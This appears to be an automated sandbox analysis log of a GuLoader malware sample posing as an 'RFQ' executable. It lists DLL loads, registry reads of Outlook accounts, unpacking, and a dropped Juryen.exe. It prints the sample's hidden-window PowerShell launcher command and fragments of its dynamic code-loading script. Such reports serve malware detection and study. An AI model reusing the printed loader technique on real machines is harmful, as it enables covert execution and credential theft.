              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: RFQ 008191.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000006.00000002.1770161341.000000000824C000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeUnpacked PE file: 13.2.Juryen.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeUnpacked PE file: 14.2.Juryen.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeUnpacked PE file: 15.2.Juryen.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.1771671696.0000000009BD8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Clapnest $Snoot $Sarkastisk), (Forstands @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Seneskedebetndelse = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cirklers)), $Ophavsretsbeskyttedes).DefineDynamicModule($Mynpacht, $false).DefineType($Superrefine, $Vaccinifer, [System.MulticastDele
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\RFQ 008191.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)
              Source: C:\Users\user\Desktop\RFQ 008191.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ABA4CA pushfd ; ret 6_2_04ABA4D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ABE9F9 push eax; mov dword ptr [esp], edx6_2_04ABEA0C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752806 push ecx; ret 11_2_1F752819
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Juryen.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004047CB
              Source: C:\Users\user\Desktop\RFQ 008191.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
